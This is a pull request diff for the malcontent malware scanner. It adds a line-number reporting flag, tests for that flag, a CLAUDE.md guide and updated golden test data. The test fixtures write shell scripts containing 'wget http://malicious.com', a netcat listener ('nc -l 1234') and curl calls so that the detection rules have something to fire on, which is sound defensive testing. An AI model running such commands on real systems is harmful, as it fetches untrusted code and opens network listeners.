### PR TITLE
Line info

### DIFF
--- a/.github/workflows/go-tests.yaml
+++ b/.github/workflows/go-tests.yaml
@@ -17,7 +17,7 @@ permissions:
 jobs:
   test:
     if: ${{ github.repository }} == 'chainguard-dev/malcontent'
-    runs-on: mal-ubuntu-latest-8-core
+    runs-on: ubuntu-latest
     container:
       image: cgr.dev/chainguard/wolfi-base@sha256:91ed94ec4e72368a9b5113f2ffb1d8e783a91db489011a89d9fad3e3816a75ba
       options: >-
@@ -26,7 +26,7 @@ jobs:
         --cap-add SETUID
         --cap-drop ALL
         --cgroupns private
-        --cpu-shares=8192
+        --cpu-shares=4096
         --memory-swappiness=0
         --security-opt no-new-privileges
         --ulimit core=0
@@ -52,7 +52,7 @@ jobs:
 
   integration:
     if: ${{ github.repository }} == 'chainguard-dev/malcontent'
-    runs-on: mal-ubuntu-latest-8-core
+    runs-on: ubuntu-latest
     container:
       image: cgr.dev/chainguard/wolfi-base@sha256:91ed94ec4e72368a9b5113f2ffb1d8e783a91db489011a89d9fad3e3816a75ba
       options: >-
@@ -61,7 +61,7 @@ jobs:
         --cap-add SETUID
         --cap-drop ALL
         --cgroupns private
-        --cpu-shares=8192
+        --cpu-shares=4096
         --memory-swappiness=0
         --security-opt no-new-privileges
         --ulimit core=0

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,0 +1,133 @@
+# CLAUDE.md
+
+This file provides guidance to Claude Code (claude.ai/code) when working with code in this repository.
+
+## Overview
+
+malcontent is a malware detection and supply chain compromise discovery tool that uses 14,500+ YARA rules to analyze programs. It supports Linux, macOS, and Windows programs across multiple file formats and languages.
+
+## Key Commands
+
+### Build
+```bash
+# Install required yara-x dependency first
+make install-yara-x
+
+# Build malcontent binary
+make out/mal
+
+# Alternative build with custom yara-x paths
+CGO_LDFLAGS="-L$(pwd)/out/lib -Wl,-rpath,$(pwd)/out/lib" \
+CGO_CPPFLAGS="-I$(pwd)/out/include" \
+PKG_CONFIG_PATH="$(pwd)/out/lib/pkgconfig" \
+go build -o out/mal ./cmd/mal
+```
+
+### Test
+```bash
+# Run unit tests
+make test
+
+# Run integration tests (downloads sample malware)
+make integration
+
+# Run specific test
+go test -v ./pkg/action -run TestScanArchive
+
+# Benchmark tests
+make bench
+```
+
+### Lint
+```bash
+# Run linters
+make lint
+
+# Fix lint issues automatically
+make fix
+```
+
+### Development
+```bash
+# Test a rule against a file
+go run ./cmd/mal analyze <file>
+
+# Debug YARA rule directly
+yara -s -w rules/<path-to-rule>.yara <file>
+
+# Refresh test data after adding samples
+make refresh-sample-testdata
+
+# Generate CPU/memory profiles
+mal --profile=true scan /path
+```
+
+## Architecture
+
+### Code Structure
+- `cmd/mal/mal.go` - CLI entry point with subcommands (analyze, diff, scan, refresh)
+- `pkg/action/` - Core scanning logic, archive handling, and diff operations
+- `pkg/compile/` - YARA rule compilation and caching
+- `pkg/render/` - Output formatting (JSON, YAML, Markdown, Terminal UI)
+- `pkg/report/` - Risk scoring and report generation
+- `rules/` - YARA rules organized by behavior category
+
+### Key Architectural Patterns
+
+1. **File Processing Pipeline**:
+   - `action.recursiveScan()` → `action.scanPath()` → `action.scanFile()`
+   - Archives are transparently extracted and scanned recursively
+   - File type detection via `programkind.File()`
+
+2. **Rule Compilation**:
+   - Rules are compiled on first use via `compile.Compile()`
+   - Cached compilation for performance
+   - Third-party rules integrated from `third_party/yara/`
+
+3. **Risk Scoring**:
+   - Each rule has a risk score (1-4)
+   - Behaviors are aggregated and weighted
+   - Differential analysis compares risk changes between versions
+
+4. **Rendering Pipeline**:
+   - `render.Renderer` interface for multiple output formats
+   - Terminal renderer uses Bubble Tea for interactive UI
+   - Markdown/JSON/YAML for CI/CD integration
+
+### Adding New Features
+
+1. **New YARA Rules**:
+   - Add to appropriate category in `rules/`
+   - Include metadata: description, risk score, references
+   - Test with sample files in `tests/`
+
+2. **New File Formats**:
+   - Extend `archive/` package for extraction
+   - Update `programkind/` for detection
+
+3. **New Renderers**:
+   - Implement `render.Renderer` interface
+   - Add to `render.New()` factory
+
+### Testing Approach
+- Unit tests for individual components
+- Integration tests with real malware samples
+- Benchmark tests for performance regression
+- Test data organized by OS and malware family in `tests/`
+
+### Common Development Tasks
+
+1. **Debugging False Positives**:
+   - Check rule in `rules/false_positives/`
+   - Use `--include-tags` to test specific behaviors
+   - Add exceptions to existing rules if needed
+
+2. **Performance Optimization**:
+   - Use `--profile=true` to generate pprof files
+   - Focus on `compile.Compile()` and `action.scanFile()`
+   - Consider parallelization in `pool.Process()`
+
+3. **Rule Development**:
+   - Study existing rules in similar categories
+   - Use `strings` and `condition` sections effectively
+   - Test against both malicious and benign samples

--- a/cmd/mal/mal.go
+++ b/cmd/mal/mal.go
@@ -59,6 +59,7 @@ var (
 	ignoreSelfFlag            bool
 	ignoreTagsFlag            string
 	includeDataFilesFlag      bool
+	lineInfoFlag              bool
 	minFileLevelFlag          int
 	minFileRiskFlag           string
 	minLevelFlag              int
@@ -269,6 +270,7 @@ func main() {
 				IgnoreSelf:            ignoreSelfFlag,
 				IgnoreTags:            ignoreTags,
 				IncludeDataFiles:      includeDataFiles,
+				LineInfo:              lineInfoFlag,
 				MinFileRisk:           minFileRisk,
 				MinRisk:               minRisk,
 				OCI:                   ociFlag,
@@ -330,6 +332,12 @@ func main() {
 				Value:       false,
 				Usage:       "Include files that are detected as non-program (binary or source) files",
 				Destination: &includeDataFilesFlag,
+			},
+			&cli.BoolFlag{
+				Name:        "line-info",
+				Value:       false,
+				Usage:       "Include starting line numbers for matched patterns",
+				Destination: &lineInfoFlag,
 			},
 			&cli.IntFlag{
 				Name:        "jobs",

--- a/cmd/mal/mal.go
+++ b/cmd/mal/mal.go
@@ -270,7 +270,6 @@ func main() {
 				IgnoreSelf:            ignoreSelfFlag,
 				IgnoreTags:            ignoreTags,
 				IncludeDataFiles:      includeDataFiles,
-				LineInfo:              lineInfoFlag,
 				MinFileRisk:           minFileRisk,
 				MinRisk:               minRisk,
 				OCI:                   ociFlag,

--- a/pkg/action/scan_line_test.go
+++ b/pkg/action/scan_line_test.go
@@ -1,0 +1,312 @@
+package action
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io/fs"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/chainguard-dev/malcontent/pkg/malcontent"
+	"github.com/chainguard-dev/malcontent/pkg/render"
+	"github.com/chainguard-dev/malcontent/rules"
+)
+
+func TestScanWithLineInfo(t *testing.T) {
+	// Create a temporary directory for test files
+	tmpDir := t.TempDir()
+
+	// Create a test file with known content and patterns
+	testFile := filepath.Join(tmpDir, "test.sh")
+	content := `#!/bin/bash
+# This is a test script
+curl http://example.com
+echo "Hello World"
+wget http://malicious.com
+nc -l 1234
+openssl enc -aes-256-cbc
+`
+	if err := os.WriteFile(testFile, []byte(content), 0o644); err != nil {
+		t.Fatalf("Failed to write test file: %v", err)
+	}
+
+	ctx := context.Background()
+
+	// Load rules
+	ruleFS := []fs.FS{rules.FS}
+	compiledRules, err := CachedRules(ctx, ruleFS)
+	if err != nil {
+		t.Fatalf("Failed to compile rules: %v", err)
+	}
+
+	// Test with line info enabled
+	configWithLineInfo := malcontent.Config{
+		Concurrency:      1,
+		IncludeDataFiles: true,
+		LineInfo:         true,
+		MinFileRisk:      0,
+		MinRisk:          0,
+		Rules:            compiledRules,
+		ScanPaths:        []string{testFile},
+		Renderer:         render.NewSimple(os.Stdout),
+	}
+
+	frs, err := recursiveScan(ctx, configWithLineInfo)
+	if err != nil {
+		t.Fatalf("Scan with line info failed: %v", err)
+	}
+
+	// Check that we got results
+	var fileReport *malcontent.FileReport
+	frs.Files.Range(func(_, value any) bool {
+		if fr, ok := value.(*malcontent.FileReport); ok {
+			fileReport = fr
+			return false
+		}
+		return true
+	})
+
+	if fileReport == nil {
+		t.Fatal("No file report found")
+	}
+
+	// Verify we have behaviors detected
+	if len(fileReport.Behaviors) == 0 {
+		t.Fatal("No behaviors detected")
+	}
+
+	// Check that line numbers are present for behaviors with matches
+	var foundLineNumbers bool
+	for _, behavior := range fileReport.Behaviors {
+		if len(behavior.MatchStrings) > 0 && len(behavior.LineNumbers) > 0 {
+			foundLineNumbers = true
+
+			// Verify line numbers are reasonable (between 1 and total lines)
+			for _, lineNum := range behavior.LineNumbers {
+				if lineNum < 1 || lineNum > 7 { // We have 7 lines in our test file
+					t.Errorf("Invalid line number %d", lineNum)
+				}
+			}
+		}
+	}
+
+	if !foundLineNumbers {
+		t.Error("No line numbers found in behaviors with matches")
+	}
+
+	// Test with line info disabled
+	configWithoutLineInfo := malcontent.Config{
+		Concurrency:      1,
+		IncludeDataFiles: true,
+		LineInfo:         false,
+		MinFileRisk:      0,
+		MinRisk:          0,
+		Rules:            compiledRules,
+		ScanPaths:        []string{testFile},
+		Renderer:         render.NewSimple(os.Stdout),
+	}
+
+	frs2, err := recursiveScan(ctx, configWithoutLineInfo)
+	if err != nil {
+		t.Fatalf("Scan without line info failed: %v", err)
+	}
+
+	// Check that line numbers are NOT present when disabled
+	frs2.Files.Range(func(_, value any) bool {
+		if fr, ok := value.(*malcontent.FileReport); ok {
+			for _, behavior := range fr.Behaviors {
+				if len(behavior.LineNumbers) > 0 {
+					t.Error("Line numbers found when line info is disabled")
+				}
+			}
+		}
+		return true
+	})
+}
+
+func TestScanBinaryWithLineInfo(t *testing.T) {
+	// Test that binary files also work correctly with line info
+	tmpDir := t.TempDir()
+
+	// Create a simple binary file with some recognizable patterns
+	binaryFile := filepath.Join(tmpDir, "test.bin")
+	binaryContent := []byte{
+		0x7F, 0x45, 0x4C, 0x46, // ELF magic
+		0x0A, // newline
+		'h', 't', 't', 'p', ':', '/', '/', 't', 'e', 's', 't', '.', 'c', 'o', 'm',
+		0x0A, // newline
+		's', 's', 'h', ':', '/', '/', 'r', 'o', 'o', 't', '@', '1', '2', '7', '.', '0', '.', '0', '.', '1',
+		0x0A,                   // newline
+		0x00, 0x00, 0x00, 0x00, // padding
+	}
+
+	if err := os.WriteFile(binaryFile, binaryContent, 0o644); err != nil {
+		t.Fatalf("Failed to write binary file: %v", err)
+	}
+
+	ctx := context.Background()
+
+	// Load rules
+	ruleFS := []fs.FS{rules.FS}
+	compiledRules, err := CachedRules(ctx, ruleFS)
+	if err != nil {
+		t.Fatalf("Failed to compile rules: %v", err)
+	}
+
+	config := malcontent.Config{
+		Concurrency:      1,
+		IncludeDataFiles: true,
+		LineInfo:         true,
+		MinFileRisk:      0,
+		MinRisk:          0,
+		Rules:            compiledRules,
+		ScanPaths:        []string{binaryFile},
+		Renderer:         render.NewSimple(os.Stdout),
+	}
+
+	frs, err := recursiveScan(ctx, config)
+	if err != nil {
+		t.Fatalf("Scan failed: %v", err)
+	}
+
+	// Verify scan completed without errors
+	found := false
+	frs.Files.Range(func(_, _ any) bool {
+		found = true
+		return false
+	})
+
+	if !found {
+		t.Error("No scan results for binary file")
+	}
+}
+
+func TestScanWithLineInfoJSON(t *testing.T) {
+	// Test JSON output with line info to verify line number splitting
+	tmpDir := t.TempDir()
+
+	// Create a test file with patterns that will match on multiple lines
+	testFile := filepath.Join(tmpDir, "multi_match.sh")
+	content := `#!/bin/bash
+curl http://test1.com
+echo "Processing..."
+curl http://test2.com
+sleep 1
+curl http://test3.com
+openssl enc -aes-256-cbc -in file.txt
+echo "Done"
+openssl dgst -sha256 file.txt
+`
+	if err := os.WriteFile(testFile, []byte(content), 0o644); err != nil {
+		t.Fatalf("Failed to write test file: %v", err)
+	}
+
+	ctx := context.Background()
+
+	// Load rules
+	ruleFS := []fs.FS{rules.FS}
+	compiledRules, err := CachedRules(ctx, ruleFS)
+	if err != nil {
+		t.Fatalf("Failed to compile rules: %v", err)
+	}
+
+	// Test with JSON renderer and line info enabled
+	var jsonBuf bytes.Buffer
+	config := malcontent.Config{
+		Concurrency:      1,
+		IncludeDataFiles: true,
+		LineInfo:         true,
+		MinFileRisk:      0,
+		MinRisk:          0,
+		Rules:            compiledRules,
+		ScanPaths:        []string{testFile},
+		Renderer:         render.NewJSON(&jsonBuf),
+	}
+
+	report, err := Scan(ctx, config)
+	if err != nil {
+		t.Fatalf("Scan failed: %v", err)
+	}
+
+	// Render the report
+	if err := config.Renderer.Full(ctx, &config, report); err != nil {
+		t.Fatalf("Failed to render JSON: %v", err)
+	}
+
+	// Parse the JSON output
+	var output render.Report
+	if err := json.Unmarshal(jsonBuf.Bytes(), &output); err != nil {
+		t.Fatalf("Failed to parse JSON output: %v", err)
+	}
+
+	// Find behaviors that should have multiple matches
+	for _, fileReport := range output.Files {
+		// Count behaviors by ID
+		behaviorCounts := make(map[string]int)
+		lineNumbersByID := make(map[string][]int)
+
+		for _, behavior := range fileReport.Behaviors {
+			behaviorCounts[behavior.ID]++
+			if len(behavior.LineNumbers) > 0 {
+				lineNumbersByID[behavior.ID] = append(lineNumbersByID[behavior.ID], behavior.LineNumbers[0])
+			}
+		}
+
+		// Check that behaviors with multiple line matches are split
+		for id, lines := range lineNumbersByID {
+			if len(lines) > 1 {
+				// Each behavior should have exactly one line number
+				for _, behavior := range fileReport.Behaviors {
+					if behavior.ID == id && len(behavior.LineNumbers) > 1 {
+						t.Errorf("Behavior %s has multiple line numbers in JSON output: %v",
+							id, behavior.LineNumbers)
+					}
+				}
+
+				// Verify line numbers are unique
+				seen := make(map[int]bool)
+				for _, line := range lines {
+					if seen[line] {
+						t.Errorf("Duplicate line number %d for behavior %s", line, id)
+					}
+					seen[line] = true
+				}
+			}
+		}
+	}
+
+	// Test with line info disabled - behaviors should not be split
+	jsonBuf.Reset()
+	config.LineInfo = false
+
+	report2, err := Scan(ctx, config)
+	if err != nil {
+		t.Fatalf("Scan without line info failed: %v", err)
+	}
+
+	if err := config.Renderer.Full(ctx, &config, report2); err != nil {
+		t.Fatalf("Failed to render JSON without line info: %v", err)
+	}
+
+	var output2 render.Report
+	if err := json.Unmarshal(jsonBuf.Bytes(), &output2); err != nil {
+		t.Fatalf("Failed to parse JSON output without line info: %v", err)
+	}
+
+	// Without line info, behaviors should not be split
+	for _, fileReport := range output2.Files {
+		behaviorIDs := make(map[string]int)
+		for _, behavior := range fileReport.Behaviors {
+			behaviorIDs[behavior.ID]++
+		}
+
+		// Each unique behavior ID should appear only once
+		for id, count := range behaviorIDs {
+			if count > 1 {
+				t.Errorf("Behavior %s appears %d times when line info is disabled", id, count)
+			}
+		}
+	}
+}

--- a/pkg/action/testdata/scan_archive
+++ b/pkg/action/testdata/scan_archive
@@ -99,6 +99,10 @@
                         "randomized",
                         "randomsbom"
                     ],
+                    "StartingLine": 13041,
+                    "EndingLine": 119414,
+                    "StartingOffset": 1992,
+                    "EndingOffset": 1222411,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random",
@@ -110,6 +114,10 @@
                     "MatchStrings": [
                         "xor_table::56789abcdefghijklmnopqrstuvwxyzABCDE"
                     ],
+                    "StartingLine": 18782,
+                    "EndingLine": 18782,
+                    "StartingOffset": 2406,
+                    "EndingOffset": 2441,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-table.yara#xor_table",
@@ -138,6 +146,10 @@
                         "hIp",
                         "IP"
                     ],
+                    "StartingLine": 594,
+                    "EndingLine": 119414,
+                    "StartingOffset": 539,
+                    "EndingOffset": 1167793,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention",
@@ -149,6 +161,10 @@
                     "MatchStrings": [
                         "serverAddress"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 14049,
+                    "StartingOffset": 26780,
+                    "EndingOffset": 26792,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address",
@@ -172,6 +188,10 @@
                         "https://reproducible",
                         "http://localhost"
                     ],
+                    "StartingLine": 18579,
+                    "EndingLine": 20182,
+                    "StartingOffset": 806,
+                    "EndingOffset": 51,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url",
@@ -183,6 +203,10 @@
                     "MatchStrings": [
                         "client_id"
                     ],
+                    "StartingLine": 18594,
+                    "EndingLine": 18594,
+                    "StartingOffset": 36,
+                    "EndingOffset": 44,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID",
@@ -194,6 +218,10 @@
                     "MatchStrings": [
                         "1.1.1.1"
                     ],
+                    "StartingLine": 27072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 274253,
+                    "EndingOffset": 234766,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/ip-dns_resolver.yara#cloudflare_dns_ip",
@@ -210,6 +238,10 @@
                         "amd64",
                         "AMD64"
                     ],
+                    "StartingLine": 18558,
+                    "EndingLine": 119414,
+                    "StartingOffset": 512,
+                    "EndingOffset": 1095238,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref",
@@ -227,6 +259,10 @@
                         "Linux",
                         "macOS"
                     ],
+                    "StartingLine": 14065,
+                    "EndingLine": 119414,
+                    "StartingOffset": 1202,
+                    "EndingOffset": 1116079,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref",
@@ -238,6 +274,10 @@
                     "MatchStrings": [
                         "archive/zip"
                     ],
+                    "StartingLine": 18613,
+                    "EndingLine": 18613,
+                    "StartingOffset": 374,
+                    "EndingOffset": 384,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip",
@@ -250,6 +290,10 @@
                         "Keychain",
                         "keychain"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 11846,
+                    "EndingOffset": 1189220,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/keychain/keychain.yara#keychain",
@@ -272,6 +316,10 @@
                         "UserPassword",
                         "passwordSet"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 11216,
+                    "EndingOffset": 1239496,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password",
@@ -284,6 +332,9 @@
                         "private_key",
                         "privateKey"
                     ],
+                    "StartingLine": 13654,
+                    "EndingLine": 119414,
+                    "EndingOffset": 175503,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val",
@@ -296,6 +347,9 @@
                         "crypto/aes",
                         "AES"
                     ],
+                    "StartingLine": 13500,
+                    "EndingLine": 119414,
+                    "EndingOffset": 1223839,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes",
@@ -307,6 +361,9 @@
                     "MatchStrings": [
                         "ciphertext"
                     ],
+                    "StartingLine": 13546,
+                    "EndingLine": 18756,
+                    "EndingOffset": 8602,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/cipher.yara#ciphertext",
@@ -336,6 +393,10 @@
                         "rsaDecryptOk",
                         "newDecrypter"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 6214,
+                    "EndingOffset": 1244166,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt",
@@ -347,6 +408,10 @@
                     "MatchStrings": [
                         "crypto/ecdsa"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 16921,
+                    "EndingOffset": 1222731,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa",
@@ -358,6 +423,10 @@
                     "MatchStrings": [
                         "ed25519"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 21518,
+                    "EndingOffset": 1254290,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519",
@@ -372,6 +441,10 @@
                         "elliptic.p256",
                         "p256Inverse"
                     ],
+                    "StartingLine": 14069,
+                    "EndingLine": 119414,
+                    "StartingOffset": 1950,
+                    "EndingOffset": 1243157,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/elliptic.yara#elliptic",
@@ -389,6 +462,10 @@
                         "publicKey",
                         "publickey"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 22095,
+                    "EndingOffset": 1264401,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key",
@@ -402,6 +479,9 @@
                         "TLSVersion",
                         "TLS13"
                     ],
+                    "StartingLine": 13309,
+                    "EndingLine": 119414,
+                    "EndingOffset": 1210385,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls",
@@ -413,6 +493,10 @@
                     "MatchStrings": [
                         "bzip2"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 35316,
+                    "EndingOffset": 1251193,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2",
@@ -424,6 +508,10 @@
                     "MatchStrings": [
                         "gzip"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 6461,
+                    "EndingOffset": 1224712,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip",
@@ -436,6 +524,10 @@
                     "MatchStrings": [
                         "lzma"
                     ],
+                    "StartingLine": 18623,
+                    "EndingLine": 18623,
+                    "StartingOffset": 464,
+                    "EndingOffset": 467,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma",
@@ -448,6 +540,10 @@
                     "MatchStrings": [
                         "zlib"
                     ],
+                    "StartingLine": 13040,
+                    "EndingLine": 119414,
+                    "StartingOffset": 56153,
+                    "EndingOffset": 1245346,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib",
@@ -462,6 +558,10 @@
                         "zstd",
                         "$ref"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 25220,
+                    "EndingOffset": 1237576,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd",
@@ -473,6 +573,10 @@
                     "MatchStrings": [
                         "-----BEGIN CERTIFICATE-----"
                     ],
+                    "StartingLine": 87145,
+                    "EndingLine": 87145,
+                    "StartingOffset": 603,
+                    "EndingOffset": 629,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-pem-certificate.yara#begin_cert",
@@ -484,6 +588,10 @@
                     "MatchStrings": [
                         "TESTING KEY-----"
                     ],
+                    "StartingLine": 19089,
+                    "EndingLine": 19116,
+                    "StartingOffset": 15,
+                    "EndingOffset": 28,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-pem-test_key.yara#testing_key",
@@ -495,6 +603,10 @@
                     "MatchStrings": [
                         "--BEGIN SSH SIGNATURE--"
                     ],
+                    "StartingLine": 87145,
+                    "EndingLine": 87145,
+                    "StartingOffset": 734,
+                    "EndingOffset": 756,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-ssh-signature.yara#ssh_signature",
@@ -506,6 +618,9 @@
                     "MatchStrings": [
                         "$ref"
                     ],
+                    "StartingLine": 87122,
+                    "EndingLine": 87122,
+                    "EndingOffset": 3,
                     "RiskScore": 2,
                     "RiskLevel": "MEDIUM",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-zstd.yara#embedded_zstd",
@@ -519,6 +634,10 @@
                         "encoding/asn1",
                         "asn1.parse"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 29375,
+                    "EndingOffset": 1223498,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/asn1.yara#go_asn1",
@@ -530,6 +649,10 @@
                     "MatchStrings": [
                         "base64"
                     ],
+                    "StartingLine": 13043,
+                    "EndingLine": 119414,
+                    "StartingOffset": 304,
+                    "EndingOffset": 1188094,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64",
@@ -541,6 +664,10 @@
                     "MatchStrings": [
                         "encoding/json"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 25685,
+                    "EndingOffset": 1199707,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json.yara#encoding_json",
@@ -552,6 +679,10 @@
                     "MatchStrings": [
                         "json.Unmarshal"
                     ],
+                    "StartingLine": 14072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 17554,
+                    "EndingOffset": 1199586,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode",
@@ -563,6 +694,10 @@
                     "MatchStrings": [
                         "MarshalJSON"
                     ],
+                    "StartingLine": 14049,
+                    "EndingLine": 119414,
+                    "StartingOffset": 1247,
+                    "EndingOffset": 977979,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#MarshalJSON",
@@ -574,6 +709,10 @@
                     "MatchStrings": [
                         "protobuf"
                     ],
+                    "StartingLine": 14089,
+                    "EndingLine": 119414,
+                    "StartingOffset": 278,
+                    "EndingOffset": 1263548,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/protobuf.yara#protobuf",
@@ -585,6 +724,10 @@
                     "MatchStrings": [
                         "yaml.Unmarshal"
                     ],
+                    "StartingLine": 14072,
+                    "EndingLine": 14072,
+                    "StartingOffset": 16490,
+                    "EndingOffset": 16503,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/yaml.yara#yaml_decode",
@@ -596,6 +739,10 @@
                     "MatchStrings": [
                         "blake2b"
                     ],
+                    "StartingLine": 14072,
+                    "EndingLine": 119414,
+                    "StartingOffset": 30,
+                    "EndingOffset": 1263939,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/blake2b.yara#crypto_blake2b",
@@ -607,6 +754,10 @@
                     "MatchStrings": [
                         "md5:"
                     ],
+                    "StartingLine": 18751,
+                    "EndingLine": 18759,
+                    "StartingOffset": 4281,
+                    "EndingOffset": 1691,
                     "RiskScore": 1,
                     "RiskLevel": "LOW",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5",
@@ -618,6 +769,10 @@
                     "MatchStrings": [
                         "SHA512"
                     ],
+                    "StartingLine": 18574,
+                    "EndingLine": 119414,
+                    "StartingOffset": 360,
+                    "EndingOffset": 1142654,
                     "RiskScore": 0,
                     "RiskLevel": "NONE",
                     "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha512.yara#SHA512",
@@ -629,6 +784,10 @@
                     "MatchStrings": [
                         "ifconfig"
                     ],
+                    "StartingLine": 18628,
+                    "EndingLine": 18628,
+                    "StartingOffset": 398,
+                    "EndingOffset": 405,
                     "RiskScore": 2,
